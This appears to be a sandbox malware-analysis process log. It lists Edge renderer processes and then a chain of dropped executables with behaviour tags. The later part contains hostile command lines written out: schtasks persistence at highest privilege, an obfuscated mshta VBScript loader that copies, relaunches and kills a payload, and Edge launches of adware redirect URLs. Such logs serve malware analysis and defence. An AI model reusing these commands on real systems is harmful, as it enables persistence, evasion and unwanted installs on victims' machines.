C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5816 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2872 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6456 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6740 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6260 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6856 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6448 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7288 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7300 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7308 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7560 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3012 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=7908 /prefetch:88⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4364 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.CdmService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=cdm --mojo-platform-channel-handle=7816 /prefetch:88⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7392 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8048 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7740 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8400 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8564 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8804 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1788 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3060 /prefetch:18⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9152 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8020 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8844 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8932 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1944 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7176 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9204 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:18⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09c42cad92c20f79.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09c42cad92c20f79.exeWed09c42cad92c20f79.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 2406⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09db0d52c38.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09db0d52c38.exeWed09db0d52c38.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 19446⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09977fdc12334.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09977fdc12334.exeWed09977fdc12334.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\ntvQls6W0Z9SGx99cektYOrz.exe"C:\Users\Admin\Pictures\Adobe Films\ntvQls6W0Z9SGx99cektYOrz.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\jbxxMselF7ZbInsUkMPdKh9r.exe"C:\Users\Admin\Pictures\Adobe Films\jbxxMselF7ZbInsUkMPdKh9r.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1988 -s 2767⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\gcqDb5zSn7BE_dUbS8yv3WOT.exe"C:\Users\Admin\Pictures\Adobe Films\gcqDb5zSn7BE_dUbS8yv3WOT.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\hhRo_PY9JOjFbOXY45EnaDd8.exe"C:\Users\Admin\Documents\hhRo_PY9JOjFbOXY45EnaDd8.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\IEObGDEzFQtHW3zNznFK1dXO.exe"C:\Users\Admin\Pictures\Adobe Films\IEObGDEzFQtHW3zNznFK1dXO.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\PHNkeRSrHp1xLWHoFmTnx6qg.exe"C:\Users\Admin\Pictures\Adobe Films\PHNkeRSrHp1xLWHoFmTnx6qg.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 17289⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\iyNQnVOAzpWstmRh0RYo_sir.exe"C:\Users\Admin\Pictures\Adobe Films\iyNQnVOAzpWstmRh0RYo_sir.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7548 -s 2809⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\jWPcmwBpFAECsMFY3BorBrqI.exe"C:\Users\Admin\Pictures\Adobe Films\jWPcmwBpFAECsMFY3BorBrqI.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\Ga2XGzxOu7DtE8i1v4n88R7k.exe"C:\Users\Admin\Pictures\Adobe Films\Ga2XGzxOu7DtE8i1v4n88R7k.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7396 -s 2449⤵
- Program crash
- Checks processor information in registry
-
C:\Users\Admin\Pictures\Adobe Films\1wpMgPxBb0rpgylDEVM8FTrO.exe"C:\Users\Admin\Pictures\Adobe Films\1wpMgPxBb0rpgylDEVM8FTrO.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\1wpMgPxBb0rpgylDEVM8FTrO.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\1wpMgPxBb0rpgylDEVM8FTrO.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\1wpMgPxBb0rpgylDEVM8FTrO.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\1wpMgPxBb0rpgylDEVM8FTrO.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "1wpMgPxBb0rpgylDEVM8FTrO.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\Cm5c7bP8UuesESgVtGU2jbXU.exe"C:\Users\Admin\Pictures\Adobe Films\Cm5c7bP8UuesESgVtGU2jbXU.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\Cm5c7bP8UuesESgVtGU2jbXU.exe"C:\Users\Admin\Pictures\Adobe Films\Cm5c7bP8UuesESgVtGU2jbXU.exe" -u9⤵
-
C:\Users\Admin\Pictures\Adobe Films\kShuz28BBCUnH_NSSeWHruw8.exe"C:\Users\Admin\Pictures\Adobe Films\kShuz28BBCUnH_NSSeWHruw8.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-EA9EE.tmp\kShuz28BBCUnH_NSSeWHruw8.tmp"C:\Users\Admin\AppData\Local\Temp\is-EA9EE.tmp\kShuz28BBCUnH_NSSeWHruw8.tmp" /SL5="$40272,506127,422400,C:\Users\Admin\Pictures\Adobe Films\kShuz28BBCUnH_NSSeWHruw8.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-CCK6P.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-CCK6P.tmp\DYbALA.exe" /S /UID=270910⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Photo Viewer\VGZXDYHCPN\foldershare.exe"C:\Program Files\Windows Photo Viewer\VGZXDYHCPN\foldershare.exe" /VERYSILENT11⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\76-91592-c72-3c88c-827d976eeb7eb\Gufiwylaehu.exe"C:\Users\Admin\AppData\Local\Temp\76-91592-c72-3c88c-827d976eeb7eb\Gufiwylaehu.exe"11⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e612⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xdc,0x104,0x108,0x100,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721512⤵
-
